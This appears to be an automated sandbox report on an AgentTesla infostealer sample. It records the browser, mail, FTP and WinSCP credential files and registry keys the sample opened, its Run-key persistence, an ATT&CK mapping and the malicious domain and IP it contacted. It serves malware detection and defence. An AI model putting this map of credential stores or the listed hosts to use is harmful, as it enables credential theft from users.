Source: Yara match	File source: 0.2.iNFGd6bDZX.exe.4221d08.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.newapp.exe.4e6ee90.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.newapp.exe.427fd00.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.newapp.exe.4eefd48.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.iNFGd6bDZX.exe.425ef28.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.iNFGd6bDZX.exe.4221d08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2925773285.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2927028894.0000000002B7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1840585657.0000000004E6E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2927556251.000000000340C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2927028894.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2918833865.0000000000436000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2927556251.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1939852793.000000000427F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2925773285.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1840585657.0000000004EEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1726457785.0000000004221000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: iNFGd6bDZX.exe PID: 7352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iNFGd6bDZX.exe PID: 7568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 7984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 8056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 2032, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 4192, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe

File opened: C:\FTP Navigator\Ftplist.txt

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match	File source: 10.2.newapp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.newapp.exe.4eefd48.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.newapp.exe.427fd00.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.iNFGd6bDZX.exe.425ef28.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.newapp.exe.4e6ee90.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.iNFGd6bDZX.exe.4221d08.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.newapp.exe.4e6ee90.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.newapp.exe.427fd00.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.newapp.exe.4eefd48.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.iNFGd6bDZX.exe.425ef28.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.iNFGd6bDZX.exe.4221d08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.1840585657.0000000004E6E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2927028894.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2918833865.0000000000436000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2927556251.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1939852793.000000000427F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2925773285.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1840585657.0000000004EEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1726457785.0000000004221000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: iNFGd6bDZX.exe PID: 7352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iNFGd6bDZX.exe PID: 7568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 7984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 8056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 2032, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 4192, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 10.2.newapp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.newapp.exe.4eefd48.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.newapp.exe.427fd00.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.iNFGd6bDZX.exe.425ef28.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.newapp.exe.4e6ee90.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.iNFGd6bDZX.exe.4221d08.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.newapp.exe.4e6ee90.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.newapp.exe.427fd00.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.newapp.exe.4eefd48.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.iNFGd6bDZX.exe.425ef28.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.iNFGd6bDZX.exe.4221d08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2925773285.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2927028894.0000000002B7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1840585657.0000000004E6E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2927556251.000000000340C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2927028894.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2918833865.0000000000436000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2927556251.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1939852793.000000000427F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2925773285.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1840585657.0000000004EEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1726457785.0000000004221000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: iNFGd6bDZX.exe PID: 7352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iNFGd6bDZX.exe PID: 7568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 7984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 8056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 2032, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 4192, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	1 Exfiltration Over Alternative Protocol	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	112 Process Injection	3 Obfuscated Files or Information	11 Input Capture	24 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	2 Software Packing	1 Credentials in Registry	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	211 Security Software Discovery	Distributed Component Object Model	11 Input Capture	23 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	2 Process Discovery	SSH	1 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	141 Virtualization/Sandbox Evasion	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	112 Process Injection	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Hidden Files and Directories	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
iNFGd6bDZX.exe	72%	Virustotal		Browse
iNFGd6bDZX.exe	63%	ReversingLabs	Win32.Trojan.Generic
iNFGd6bDZX.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\newapp\newapp.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\newapp\newapp.exe	63%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label	Link
http://ftp.ercolina-usa.com	0%	Avira URL Cloud	safe
http://ercolina-usa.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
ercolina-usa.com	192.254.225.136	true	true	unknown
api.ipify.org	104.26.12.205	true	false	high
ftp.ercolina-usa.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/?	iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	false		high
https://account.dyn.com/	iNFGd6bDZX.exe, 00000000.00000002.1726457785.0000000004221000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1840585657.0000000004E6E000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1840585657.0000000004EEF000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2918833865.0000000000436000.00000040.00000400.00020000.00000000.sdmp, newapp.exe, 0000000C.00000002.1939852793.000000000427F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers?	iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.tiro.com	iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers	iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.org/t	iNFGd6bDZX.exe, 00000005.00000002.2927556251.0000000003391000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2927028894.0000000002B0C000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000E.00000002.2925773285.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ftp.ercolina-usa.com	iNFGd6bDZX.exe, 00000005.00000002.2927556251.000000000340C000.00000004.00000800.00020000.00000000.sdmp, iNFGd6bDZX.exe, 00000005.00000002.2927556251.000000000346B000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2927028894.0000000002B7C000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000E.00000002.2925773285.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ercolina-usa.com	iNFGd6bDZX.exe, 00000005.00000002.2927556251.000000000340C000.00000004.00000800.00020000.00000000.sdmp, iNFGd6bDZX.exe, 00000005.00000002.2927556251.000000000346B000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2927028894.0000000002B7C000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000E.00000002.2925773285.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sajatypeworks.com	iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.typography.netD	iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm	iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.org	iNFGd6bDZX.exe, 00000000.00000002.1726457785.0000000004221000.00000004.00000800.00020000.00000000.sdmp, iNFGd6bDZX.exe, 00000005.00000002.2927556251.0000000003391000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1840585657.0000000004E6E000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1840585657.0000000004EEF000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2927028894.0000000002B0C000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2918833865.0000000000436000.00000040.00000400.00020000.00000000.sdmp, newapp.exe, 0000000C.00000002.1939852793.000000000427F000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000E.00000002.2925773285.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/frere-user.html	iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/DPlease	iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers8	iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://localhost/arkanoid_server/requests.php	newapp.exe, 0000000C.00000002.1923055304.0000000002689000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.urwpp.deDPlease	iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zhongyicts.com.cn	iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	iNFGd6bDZX.exe, 00000000.00000002.1724879627.0000000002A05000.00000004.00000800.00020000.00000000.sdmp, iNFGd6bDZX.exe, 00000005.00000002.2927556251.0000000003391000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1837746080.0000000003695000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2927028894.0000000002B0C000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000C.00000002.1923055304.0000000002A28000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000E.00000002.2925773285.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
192.254.225.136	ercolina-usa.com	United States		46606	UNIFIEDLAYER-AS-1US	true
104.26.12.205	api.ipify.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588699
Start date and time:	2025-01-11 04:20:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	iNFGd6bDZX.exe renamed because original name is a hash value
Original Sample Name:	9802175dc78cef260413c05623704f267eaa8184d8d6bcb68e15e82de4ee696e.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@21/9@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 253 Number of non-executed functions: 27
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27, 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:21:02	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run newapp C:\Users\user\AppData\Roaming\newapp\newapp.exe
03:21:10	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run newapp C:\Users\user\AppData\Roaming\newapp\newapp.exe
22:20:58	API Interceptor	1620610x Sleep call for process: iNFGd6bDZX.exe modified
22:21:00	API Interceptor	17x Sleep call for process: powershell.exe modified
22:21:11	API Interceptor	1168848x Sleep call for process: newapp.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
192.254.225.136	B8FnDUj8hy.exe	Get hash	malicious	AgentTesla	Browse
	QUOTATION#008792.exe	Get hash	malicious	AgentTesla	Browse
	RFQ-004282A.Teknolojileri A.S.exe	Get hash	malicious	AgentTesla	Browse
	QUOTATION#08670.exe	Get hash	malicious	AgentTesla	Browse
	SPECIFICATIONS.exe	Get hash	malicious	AgentTesla	Browse
	TECHNICAL SPECIFICATIONS.exe	Get hash	malicious	AgentTesla	Browse
	uLFOeGZaJS.exe	Get hash	malicious	AgentTesla	Browse
	RICHIESTA D'OFFERTA.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse
	QUOTATION#09678.exe	Get hash	malicious	AgentTesla	Browse
	PURCHASE SPCIFICIATIONS.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
104.26.12.205	Yoranis Setup.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	RtU8kXPnKr.exe	Get hash	malicious	Quasar	Browse	api.ipify.org/
	jgbC220X2U.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=text
	xKvkNk9SXR.exe	Get hash	malicious	TrojanRansom	Browse	api.ipify.org/
	GD8c7ARn8q.exe	Get hash	malicious	TrojanRansom	Browse	api.ipify.org/
	8AbMCL2dxM.exe	Get hash	malicious	RCRU64, TrojanRansom	Browse	api.ipify.org/
	Simple2.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Ransomware Mallox.exe	Get hash	malicious	Targeted Ransomware	Browse	api.ipify.org/
	Yc9hcFC1ux.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	6706e721f2c06.exe	Get hash	malicious	Remcos	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	MyzWeEOlqb.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	5hD3Yjf7xD.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	ukBQ4ch2nE.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	ru52XOQ1p7.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	xJZHVgxQul.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	jG8N6WDJOx.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	HGhGAjCVw5.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	https://glfbanks.com/	Get hash	malicious	HTMLPhisher	Browse	104.26.12.205
	s2Jg1MAahY.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	Y8Q1voljvb.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	n2pGr8w21V.exe	Get hash	malicious	FormBook	Browse	104.18.73.116
	tNXl4XhgmV.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	MyzWeEOlqb.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	02Eh1ah35H.exe	Get hash	malicious	FormBook, GuLoader	Browse	172.67.167.146
	5hD3Yjf7xD.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	MBOaS3GRtF.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	https://freesourcecodes70738.emlnk.com/lt.php?x=3DZy~GDLVnab5KCs-Nu4WOae1qEoiN9xvxk1XaPMVXahD5B9-Uy.xuW-242imNX	Get hash	malicious	Unknown	Browse	104.17.205.31
